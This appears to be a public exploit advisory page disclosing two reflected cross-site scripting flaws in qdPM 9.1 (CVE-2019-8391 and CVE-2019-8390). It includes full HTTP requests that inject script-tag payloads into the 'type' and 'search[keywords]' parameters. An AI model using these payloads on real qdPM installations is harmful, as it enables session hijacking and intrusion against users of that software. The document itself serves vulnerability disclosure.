qdPM 9.1 Cross Site Scripting

2019.02.19
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79

=========================================================================================== # Exploit Title: qdPM 9.1 - 'type' XSS Injection # CVE: CVE-2019-8391. # Date: 14-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://qdpm.net # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: v9.1 # Category: Webapps # Tested on: Wamp64, @Win # Software description: Free project management tool for small team qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management. =========================================================================================== # POC - XSS # Parameters : type # Attack Pattern : tasks_columns_list<script>bKtx(9366)</script> # GET Request: http://localhost/qdpm/index.php/configuration =========================================================================================== GET /qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script> HTTP/1.1 Referer: http://localhost/qdPM/ Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1 Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* =========================================================================================== # Exploit Title: qdPM 9.1 - 'search[keywords]' XSS Injection # CVE: CVE-2019-8390 # Date: 14-02-2019 # Exploit Author: Mehmet EMIROGLU # Vendor Homepage: http://qdpm.net # Software Link: http://qdpm.net/download-qdpm-free-project-management # Version: v9.1 # Category: Webapps # Tested on: Wamp64, @Win # Software description: Free project management tool for small team qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact using a Ticket System that is integrated into Task management. =========================================================================================== # POC - XSS # Parameters : search[keywords] # Attack Pattern : e"><script>zi2u(9111)</script> # POST Request : http://localhost/qdpm/index.php/configuration =========================================================================================== POST /qdpm/index.php/users HTTP/1.1 Content-Length: 73 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/qdPM/ Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1 Host: localhost Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* search[keywords]=e"><script>zi2u(9111)</script>&search_by_extrafields[]=9


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top